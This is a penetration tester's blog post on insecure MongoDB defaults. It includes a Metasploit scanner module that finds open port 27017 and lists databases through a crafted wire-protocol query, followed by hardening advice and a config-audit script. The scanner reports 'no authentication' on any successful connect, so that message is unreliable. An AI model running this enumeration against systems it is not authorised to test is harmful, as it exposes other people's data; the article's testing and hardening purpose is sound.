Mongodb - Security Weaknesses in a typical NoSQL database


Over the last year or so, I’ve noticed 2 ports appearing more frequently during internal penetration tests, namely 27017/tcp and 28017/tcp. These can be easily missed if full port scans are not performed.

A quick service scan revealed this as ‘MongoDB’. I had heard of it before, but never really taken the time to look at it in any great detail. After a couple of hours of research, I realised this database was coming up in the world. Looking at the Production Deployment Use Cases on MongoDB’s website, it’s being used by large corporations such as Disney, Forbes, MTV and the UK Government, to name just a few.

So, it was time to fire up a test VM, and download the latest version to have a ‘play’.

For those of you not familiar with MongoDB, below are the pertinent points to bring you up-to-speed:

  • 10Gen brought out the first release in 2007, so it’s not that old.
  • It’s a “document-orientated” database (otherwise known as a NoSQL database).
  • Typically, NoSQL DBs use XML, YAML, JSON or BSON to encode the data. MongoDB uses Binary JSON (BSON).
  • NoSQL databases have their own terminology that is different from typical relational databases such as MSSQL and MySQL:
    • Document = Row or Record
    • Collection = Table or View
    • Field = Column
  • So, a typical NoSQL database collection (table) holds one or more “documents” (records). Each document can have one or more fields (columns).
  • It’s being used more and more in the production of agile applications i.e. quick to develop and deploy and often used in “big data” type projects. These can include banking applications and document storage as examples.

Ok, so what do you need to know to hack/test it? Its default ports are as follows:

  • 27017 - This is the default port for mongod and mongos (mongo shell) instances. You can change this port with port or --port.
  • 27018 - This is the default port when running with the --shardsvr runtime operation or the shardsvr setting.
  • 27019 - This is the default port when running with the --configsvr runtime operation or the configsvr setting.
  • 28017 - This is the default port for the web status page. This is always accessible at a port that is 1000 greater than the port determined by port.

So, playing with the most recent version from their web site, possible attack vectors I can think of are as follows (there may be more):

1)      Authentication Weakness – By default the DB installs with NO password credentials! Reading the MongoDB manual, the MongoDB developers have put the onus of security entirely in the hands of the application developers and on running it in a trusted environment. I thought lessons had been learnt from the older, more mature RDBMS cousins and their historic authentication weaknesses… it seems not.

2)      Authorization Weaknesses – Any created user has read-only access to the WHOLE database. That essentially means that once you have a user, you have been given access by default to everything stored in the database… not the most secure.

3)      Admin Authorization Weakness – A user with access to the Admin database has read/write access to everything! There is no granularity. We already know that by default there is no Admin password, so… guess what… by default we have access to everything!

4)      Clear Text – All data is sent in the clear, so the data can be captured in an ARP Poison attack or other such MITM attack.

5)      Multiple Interfaces Weakness – By default the service will bind to ALL available interfaces… not so good if you’re installing it in a dual-homed environment… you could essentially expose the whole database to a less trusted DMZ if you weren’t careful!

6)      No Encryption – Currently there is no data encryption.

7)      NoSQL implies it’s safer than RDBMSs, which are vulnerable to SQL Injection – Therefore it’s being deployed with this inference, assuming more security. The above shows this isn’t the case!

Certainly the times I have seen this during internal engagements, it has been installed in default mode i.e. NO PASSWORD, READ/WRITE ACCESS.

From my experience, the developers using it clearly tend to prioritise getting a working application up and running over looking at the security.

So how do you go about testing it?

There are several clients available from the MongoDB web site, including the MongoDB shell, e.g. curl http://downloads.mongodb.org/linux/mongodb-linux-i686-2.2.2.tgz > mongo.tgz

This is currently 52.2MB in size.

In terms of security tools, there isn’t a lot out there at the moment. Metasploit does have a scanner:

use  auxiliary/scanner/mongodb/mongodb_login

This is good for checking passwords when authentication is enabled, but it didn’t tell me if the default conditions were met, i.e. that the MongoDB instance had no credentials.

Therefore, I wanted to amend the above tool to perform the following functions:

  • Find hosts with TCP port 27017 open
  • Check if authentication is required or not
  • Attempt to log in to the Admin DB with no authentication
  • List the available databases

The Metasploit script below performs the above functions:

#### This file will look for MongoDB databases on the network
#### and determine if authentication is required or not.
#### If it isn't then it will enumerate basic information from it.
#### Makes use of the Mongo Wire Protocol (MWP) on default TCP port 27017.
#### Written by: David Kirkpatrick

require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  include Msf::Auxiliary::Scanner
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'MongoDB Enum Utility',
      'Description' => %q{
        Kirky's MongoDB Enumerator
      },
      'References'  =>
        [
          [ 'URL', 'http://www.mongodb.org/display/DOCS/Mongo+Wire+Protocol' ],
          [ 'URL', 'http://www.mongodb.org/display/DOCS/Implementing+Authentication+in+a+Driver' ]
        ],
      'Author'      => [ 'kirky' ],
      'License'     => MSF_LICENSE
    ))

    register_options(
      [
        Opt::RPORT(27017),
        OptString.new('DB', [ true, "Database to use", "admin" ])
      ], self.class)

    deregister_options('RHOST')
  end

  def run_host(ip)
    print_status("Scanning IP: #{ip}")
    begin
      connect
      print_good("MongoDB Server #{ip} alive with no authentication!!!")
      show_dbs(ip)
    rescue ::Exception => e
      print_error("MongoDB Server: #{e}")
      return
    end
  end

  # Build an OP_QUERY Mongo Wire Protocol message that runs the listDatabases
  # command against admin.$cmd, send it and pull the database names from the reply.
  def show_dbs(ip)
    # BSON document { listDatabases: 1.0 }: int32 length, 0x01 (double) element type,
    # cstring key, 8-byte little-endian double 1.0, trailing 0x00
    doc  = "\x01" + "listDatabases\x00" + [1.0].pack('E') + "\x00"
    doc  = [doc.bytesize + 4].pack('V') + doc         # MWP Doc Length (28)

    body  = [0].pack('V')                             # MWP OP_QUERY flags
    body << "admin.$cmd\x00"                          # fullCollectionName database=admin, collection=$cmd
    body << [0].pack('V')                             # MWP numberToSkip (0)
    body << [1].pack('V')                             # MWP numberToReturn (1)
    body << doc                                       # MWP query listDatabases

    header  = [body.bytesize + 16].pack('V')          # MWP message length (16-byte header + body)
    header << Rex::Text.rand_text(4)                  # MWP Request ID
    header << [0xffffffff].pack('V')                  # MWP responseTo
    header << [2004].pack('V')                        # MWP Opcode 2004 (OP_QUERY)

    sock.put(header + body)
    response = sock.recv(1024)

    # Each database entry in the reply looks like: \x02name\x00<int32 len><dbname>\x00\x01sizeOnDisk
    # The /m flag keeps '.' matching even if a length byte happens to be 0x0a.
    names = response.scan(/name.....(.*?)..sizeOnDisk/m)
    print_status("List of Databases on #{ip}:- #{names.join(',')}")
    disconnect
  end
end

Given the lack of security in the default MongoDB install, basic security hardening best practices should include:

  1. Disable the default status page – use the ‘nohttpinterface’ option to turn off the 28017 port.
  2. Use a different port – use the ‘port’ option.
  3. Do not enable REST in production environments – don’t use the ‘rest’ option.
  4. Bind the mongodb process to only one interface/IP – use the ‘bind_ip’ option.
  5. Don’t run the mongodb daemon as root.
  6. Disable anonymous access – use the ‘auth’ option.
  7. Encrypt data – “To support audit requirements, you may need to encrypt data stored in MongoDB. For best results you can encrypt this data in the application layer, by encrypting the content of fields that hold secure data.”
  8. Encrypt communication – it is recommended to use SSL.

Trusting the security of the database entirely to the application and how well it's written will continue to be a security issue; history has shown that.
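The checklist above maps directly onto settings in the old key = value mongod.conf format. The following Ruby script is an added example, not part of the original post or of MongoDB itself: it parses such a config file and reports which of the configuration-level items (1, 2, 3, 4 and 6) are not met. The two config texts are constructed samples; item 5 (not running as root) and items 7 and 8 are not config keys and are not checked here.

```ruby
# Parse the pre-2.6 "key = value" mongod.conf format into a Hash of strings.
# '#' lines are comments; a bare key with no value is treated as "true".
def parse_mongod_conf(text)
  conf = {}
  text.each_line do |line|
    line = line.strip
    next if line.empty? || line.start_with?('#')
    key, value = line.split('=', 2).map(&:strip)
    conf[key] = value.nil? || value.empty? ? 'true' : value
  end
  conf
end

TRUE_VALUES = %w[true 1 yes on].freeze

# Return one finding string per unmet hardening item from the checklist.
def audit_mongod_conf(conf)
  enabled = ->(key) { TRUE_VALUES.include?(conf.fetch(key, 'false').downcase) }
  findings = []
  findings << 'auth not enabled: anonymous clients get read/write access to everything' unless enabled.call('auth')
  findings << 'nohttpinterface not set: status page exposed on port + 1000 (28017 by default)' unless enabled.call('nohttpinterface')
  findings << 'rest enabled: the REST interface should be off in production' if enabled.call('rest')
  bind = conf['bind_ip']
  findings << 'bind_ip not set or 0.0.0.0: mongod listens on all interfaces' if bind.nil? || bind == '0.0.0.0'
  findings << 'port left at the default 27017' if conf.fetch('port', '27017') == '27017'
  findings
end

# Constructed sample: a default-style install that only sets paths.
WEAK_CONF = <<~CONF
  # mongod.conf (constructed example)
  dbpath = /var/lib/mongodb
  logpath = /var/log/mongodb/mongod.log
  logappend = true
CONF

# Constructed sample: the same install with the checklist applied.
HARDENED_CONF = <<~CONF
  dbpath = /var/lib/mongodb
  logpath = /var/log/mongodb/mongod.log
  logappend = true
  port = 37017
  bind_ip = 10.0.0.5
  auth = true
  nohttpinterface = true
  rest = false
CONF

if __FILE__ == $0
  audit_mongod_conf(parse_mongod_conf(WEAK_CONF)).each { |f| puts "WEAK: #{f}" }
  puts "hardened findings: #{audit_mongod_conf(parse_mongod_conf(HARDENED_CONF)).inspect}"
end
```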

So, if you haven’t added this to your list of top attack vectors, I’d recommend starting to look for it in your port scans. At the moment, the instances I’ve seen it on the network, the majority of times it’s a totally unprotected database.

If the developers of mongodb continue to leave the onus of the security to the people using it, I guess it will continue to be an easy target! I can’t wait till they start adding commands to interact with the operating system! That will be fun! It's certainly one to keep an eye on to see how it develops. 
